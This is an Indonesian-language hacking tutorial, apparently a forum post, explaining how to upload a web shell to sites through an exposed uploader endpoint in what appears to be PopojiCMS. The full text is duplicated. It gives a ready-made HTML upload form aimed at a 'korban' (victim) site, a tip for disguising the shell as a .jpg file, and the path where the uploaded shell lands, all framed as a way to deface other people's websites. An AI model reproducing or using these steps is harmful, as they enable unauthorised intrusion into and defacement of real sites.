Ok guys kali ini saya akan kasih tutor upload shel.
Ok tanpa perlu banyak basa n basi,kita lanjut ketutornya
1.Login Web Yg Udh Login :D
2.Klo udh Login Langsung Pasang bug/vuln -> /po-admin/js/plugins/uploader/upload.php
Contoh Korban.com/po-admin/js/plugins/uploader/upload.php
Ciri" Vuln -> {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
CSRF Code:
<form method="post" action="korban.com/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="Namashell.php">
<input type="submit" value="exploit">
</form>
*Save Dengan .html contoh anjay.html
*Lalu Buka dengan browser lo :D
*target.com/po-admin/js/plugins/uploader/upload.php #Korban.com Ganti Dengan web korban lo
*Namashell.php #Namashell Yg mau di pake untuk deface :D
3.Uploud Shell kalian, Shell Harus Berenstensi .jpg Contoh Shell.jpg, Bukan .php , .phtml , atau jenis Bypass Estensi Yg lain Klo mau Pake Tamper Data :D atau lo coba aja sendiri pake .php :D
4.Jika Sukses akan ada bacaan Error. Untuk Liat Hasilnya pasang exploit /po-content/po-upload/ Klo Pas buka exploit Bacaan Forbidden :v Silahkan lo Keluarkan Pikiran untuk cari Backdoor :v atau cari web Yg ada di shell lo :v
5.Cari Nama Shell lo
6.Done :D (y)
Ok ski
Ok tanpa perlu banyak basa n basi,kita lanjut ketutornya
1.Login Web Yg Udh Login :D
2.Klo udh Login Langsung Pasang bug/vuln -> /po-admin/js/plugins/uploader/upload.php
Contoh Korban.com/po-admin/js/plugins/uploader/upload.php
Ciri" Vuln -> {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
CSRF Code:
<form method="post" action="korban.com/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="Namashell.php">
<input type="submit" value="exploit">
</form>
*Save Dengan .html contoh anjay.html
*Lalu Buka dengan browser lo :D
*target.com/po-admin/js/plugins/uploader/upload.php #Korban.com Ganti Dengan web korban lo
*Namashell.php #Namashell Yg mau di pake untuk deface :D
3.Uploud Shell kalian, Shell Harus Berenstensi .jpg Contoh Shell.jpg, Bukan .php , .phtml , atau jenis Bypass Estensi Yg lain Klo mau Pake Tamper Data :D atau lo coba aja sendiri pake .php :D
4.Jika Sukses akan ada bacaan Error. Untuk Liat Hasilnya pasang exploit /po-content/po-upload/ Klo Pas buka exploit Bacaan Forbidden :v Silahkan lo Keluarkan Pikiran untuk cari Backdoor :v atau cari web Yg ada di shell lo :v
5.Cari Nama Shell lo
6.Done :D (y)
Ok ski